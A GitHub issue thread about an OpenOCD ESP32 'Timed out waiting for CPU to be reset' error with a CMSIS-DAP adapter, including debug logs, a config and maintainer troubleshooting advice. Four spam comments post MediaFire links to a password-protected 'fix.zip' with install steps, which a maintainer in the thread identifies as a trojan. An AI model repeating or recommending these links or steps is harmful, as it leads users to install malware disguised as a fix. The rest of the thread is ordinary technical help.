espressif/openocd-esp32 #333: CMSIS-DAP ❌ Error: [esp32.cpu0] Timed out waiting for CPU to be reset, target state=2

yueduz, 2024-08-28:
### Development Kit

Custom

### Module or chip used

ESP32-WROVER-E

### Debug Adapter

nanoDAP-HS

### OpenOCD version

v0.12.0-esp32-20240318

### Operating System

ArchLinux

### Using an IDE ?

vscode

### OpenOCD command line

ESP-IDF:Flash Device

### JTAG Clock Speed

5000

### ESP-IDF version

v5.3.0

### Problem Description

Click "ESP-IDF: Flash Device" on the status bar of vscode

### Debug Logs

```shell
Open On-Chip Debugger v0.12.0-esp32-20240318 (2024-03-18-18:25)
Licensed under GNU GPL v2
For bug reports, read
	http://openocd.org/doc/doxygen/bugs.html

debug_level: 2

Info : Listening on port 6666 for tcl connections
Info : Listening on port 4444 for telnet connections

Info : CMSIS-DAP: SWD supported
Info : CMSIS-DAP: JTAG supported
Info : CMSIS-DAP: Atomic commands supported

Info : CMSIS-DAP: FW Version = 0254

Info : CMSIS-DAP: Serial# = 110136025020312038534751313034203032303697969903

Info : CMSIS-DAP: Interface Initialised (JTAG)

Info : SWCLK/TCK = 1 SWDIO/TMS = 1 TDI = 1 TDO = 1 nTRST = 0 nRESET = 1

Info : CMSIS-DAP: Interface ready

Info : clock speed 5000 kHz

Info : cmsis-dap JTAG TLR_RESET

Info : cmsis-dap JTAG TLR_RESET

Info : JTAG tap: esp32.cpu0 tap/device found: 0x120034e5 (mfg: 0x272 (Tensilica), part: 0x2003, ver: 0x1)
Info : JTAG tap: esp32.cpu1 tap/device found: 0x120034e5 (mfg: 0x272 (Tensilica), part: 0x2003, ver: 0x1)

Info : [esp32.cpu0] Examination succeed

Info : [esp32.cpu1] Examination succeed

Info : starting gdb server for esp32.cpu0 on 3333
Info : Listening on port 3333 for gdb connections

Info : [esp32.cpu0] Target halted, PC=0x40085986, debug_reason=00000000

❌ Error: [esp32.cpu0] Timed out waiting for CPU to be reset, target state=2

Info : [esp32.cpu0] Reset cause (52) - (Unknown reset cause)

Info : [esp32.cpu1] Debug controller was reset.

Info : [esp32.cpu1] Core was reset.

Info : accepting 'gdb' connection on tcp/3333

Info : [esp32.cpu0] Debug controller was reset.

Info : [esp32.cpu0] Core was reset.

Info : [esp32.cpu1] Target halted, PC=0x40085986, debug_reason=00000000

❌ Error: [esp32.cpu1] Timed out waiting for CPU to be reset, target state=2

Info : [esp32.cpu0] Debug controller was reset.

Info : [esp32.cpu0] Core was reset.

Info : [esp32.cpu1] Debug controller was reset.

Info : [esp32.cpu1] Core was reset.

Info : [esp32.cpu0] Target halted, PC=0x40085986, debug_reason=00000000

Info : [esp32.cpu0] Reset cause (52) - (Unknown reset cause)

Info : Set GDB target to 'esp32.cpu0'

Info : [esp32.cpu1] Debug controller was reset.

Info : [esp32.cpu1] Core was reset.

Info : [esp32.cpu1] Target halted, PC=0x40085986, debug_reason=00000000
```

### Expected behavior

Everything works correctly when I use JLink, but I want my CMSIS-DAP (nanoDAP) to work as well.

### Screenshots

This is my custom configuration:
```
# Source the JTAG interface configuration file
source [find interface/cmsis-dap.cfg]
# 设置JTAG接口  
transport select  jtag
  
set ESP32_FLASH_VOLTAGE 3.3
adapter speed 5000
# Source the ESP32 configuration file
source [find target/esp32.cfg]
```

cnhbliyou, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

HeinousAgenda38, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

ViniciusSCG, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

Spritetm, 2024-08-28:
Note - someone replied with a mediafire link to a 'solution' containing a password-protected root file. That file contained a trojan. If you downloaded & ran that, please run a virus scan or do a full reinstall of your computer.

erhankur, 2024-08-28:
@yueduz As a Linux user, you should be able to build from the source. To increase the timeout, you can modify it [here](https://github.com/espressif/openocd-esp32/blob/master/src/target/espressif/esp32.c#L229). You can set it to 1000 or 5000, whichever works best for you.

Or you can simply disable the FLASH support and try. 

`openocd -c "set ESP_FLASH_SIZE 0" -f target/esp32.cfg -f <interface_config>`

yueduz, 2024-08-28:
[image]
I tried to compile openocd according to this guide "https://docs.espressif.com/projects/esp-idf/en/v5.3/esp32/api-guides/jtag-debugging/building-openocd-linux.html"
After the compilation, the directory "~/openocd-esp32/bin" mentioned in the article did not appear in the directory

yueduz, 2024-08-28:
I replaced the idf openocd with my own compiled openocd and got the same result. The timeout value was set to 5000

yueduz, 2024-08-29:
[log.zip](https://github.com/user-attachments/files/16790315/log.zip)
This log uses the OPENOCD compiled by myself. The two parameters you mentioned were changed to 500. I forgot to describe a phenomenon. The module kept restarting when it timed out. After changing the timeout parameters, the module restart speed did not change. My module has a light-on program that can run normally. I judge the restart speed by observing the speed of the light.

erhankur, 2024-09-09:
@yueduz I will give a try with my CMSIS nano adapter and come back. In the meantime I found similar issue here. You can find something useful for you. https://github.com/espressif/openocd-esp32/issues/292